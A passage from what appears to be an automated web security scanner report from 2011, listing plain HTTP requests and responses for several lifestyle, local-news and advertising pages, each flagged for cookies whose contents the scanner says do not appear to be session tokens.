ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 17:21:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=k4ZRNJpwIg02F1BCdbdRdgwUwXUHI8Y4F1BCYTeRdgQ3gZUHIQTnG1BCF2pRdgAohXUHIYZ4F1BCKGeRdgwohXUHIca4F1BCiGeRdgQshXUHwOIAM/oB0L7YCwAoGuxr1RQcKaYAGK2AI9YB7M53EkL3FJwgPXw6TVkJsuWB/0mxzfa7GIaWGDdrMaw41Zg3kq1B6bjxdp6bDwWZGu3r4fQsMaM+wa3BW8ox43I9HsfzFp/sNiQQoaUHs2DC1xmBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/ Set-Cookie: GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Tue, 29-Jan-2013 17:21:40 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Sun, 30 Jan 2011 18:21:40 GMT Content-Type: image/gif Content-Length: 49
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:11 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA08 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=95617ed8b1e0449b8e93c4352fb8c4ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=F82F814B9CA14A8DA8EF5EB7228D86A7; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 31456
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv=" ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /relationships/ HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:17 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA09 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=ad185c8cd036476ab99f219f50cae67f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=4ACBAFEABC3E458D93445CB0BF71AA56; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:17 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 37451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv=" ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /relationships/staticslideshowglamour.aspx HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:19 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA13 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=3a0a17b7e3454f56a4bcc12d1023d4df; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=02D6064FB59C4177880821E6DA25C485; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:19 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 34795
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-home/ HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:09:26 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA10 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=a62fddde6fef43f48d53312bf038943f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=DE365542A27E43F9A2D20EEC313CB20E; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:26 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 34127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv=" ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784>1=32067 HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:29 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA13 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=2d389eb7e7ea4ae0a473db58b1a5758b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=42164453E4924CB89C5B977561EA27D0; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 37466
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-life/family-parenting/article.aspx HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sat, 29 Jan 2011 23:47:26 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA12 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Location: http://lifestyle.redacted/your-life/family-parenting/default.aspx Set-Cookie: MC1=V=3&GUID=e5a2e16a67154266a9d498fd513a08c5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=2588A011AE014923A2AA5BE79447364F; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/ Cache-Control: no-cache Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-life/new-year-new-you/video.aspx HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:25 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA12 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=a1ed2a58c8c240e8aa192c9ab451625e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=1078BE57F6E649E38B580A5D9F01AA70; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17578
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-life/your-money-today/article.aspx HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sat, 29 Jan 2011 23:47:23 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA09 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Location: http://lifestyle.redacted/your-life/family-parenting/default.aspx Set-Cookie: MC1=V=3&GUID=0398126e49724201804ec2ac840e992d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=57CE9474CD8C417D817D0DE1275373E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:23 GMT; path=/ Cache-Control: no-cache Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-life/your-money-today/video.aspx HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:22 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA14 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=90974142a1fa41e29c7695f2839c0b2b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=891F4DE87D9848CF80723C7BDFB3C47D; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:22 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 18282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-look/ HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:11 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA12 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=6dd6fe6121814e1988587a283896d37d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=1E75E2518F694A5EA1B2E04278A9FA88; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 36735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-look/makeup-skin-care-hair/staticslideshowessence.aspx HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:14 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA10 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=e4b40a5c5380474087c7ce996b9332b8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=D137C55805D5479EA6BDD999E5265BC4; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:13 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 48583
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /your-look/video/ HTTP/1.1 Host: lifestyle.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:09:21 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA14 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=2ca1bb8bab954b2e8916ae5a5e84634d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=A5D1B9B54E4F4F0A904965554C0FDE74; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:20 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 20440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv=" ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: live.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:08:23 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Host,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=a4bc8d41ac71ec541f1bf853a146540d; expires=Sat, 25-Jan-2031 02:08:23 GMT; path=/; domain=.newsvine.com Content-Length: 0 Content-Type: text/html Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:29 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA29 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=8349c3df213b40858bffbf1ed5e320d4; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=AEB046B1DD804980BD22C1D7DC865D48; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 45759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /events.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 23:47:53 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA30 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 STATUS_CODE: NotFound Pragma: no-cache Set-Cookie: MC1=V=3&GUID=0af244c7b84341db94fa63f78ec59843; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=7CDA6FC0BCE8438688C10A27DAA3A3FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:53 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 6288
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gas-traffic.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:09:28 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA27 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=5b47497cc43743d9be4c3d0002efa31f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=72D4472BCF114A3497BE87B9061DAD51; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:28 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 44553
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hourly.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:52 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA25 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=fe9b558f11c048c5b0bcfead5c27909c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=D700EC8FE6A84E6E86AF10C957726EEB; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:52 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 52446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /movies-events.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:43 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA28 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=362ea74ed69b4e3e91979daf6227ebc5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=54E9E8A3E60641D9AC7FE4403046D572; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:43 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 59606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:29 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA32 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=3953a7e65afb42b0ade3749d752dcf1c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=C14043A1E67E44BCAA9A3B68AA8AFD89; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 45752
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /restaurants.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:45 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA31 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=11c3bf43b93e4ed9af237f65b02844d7; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=47142BBDAAA74E00893F20DA82ED8C2E; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:45 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 49227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sports.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:41 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA27 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=d11d2c165e674866abd16c8b8cb9e1bb; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=A7A43B87D4E04DEA9AC850EC95E92AE2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:41 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 94929
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ten-day.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:49 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA29 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=b091c91e5f57464f867c86a6838b0181; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=5D4B178CF6734098BD0B688BB765F218; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:49 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 49042
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /weather.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:33 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA30 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=fd5b4d05da194df0bdd44cf8adbd21ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=2B70DCC8FEC94F45B962D0715AF96955; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:33 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 48963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
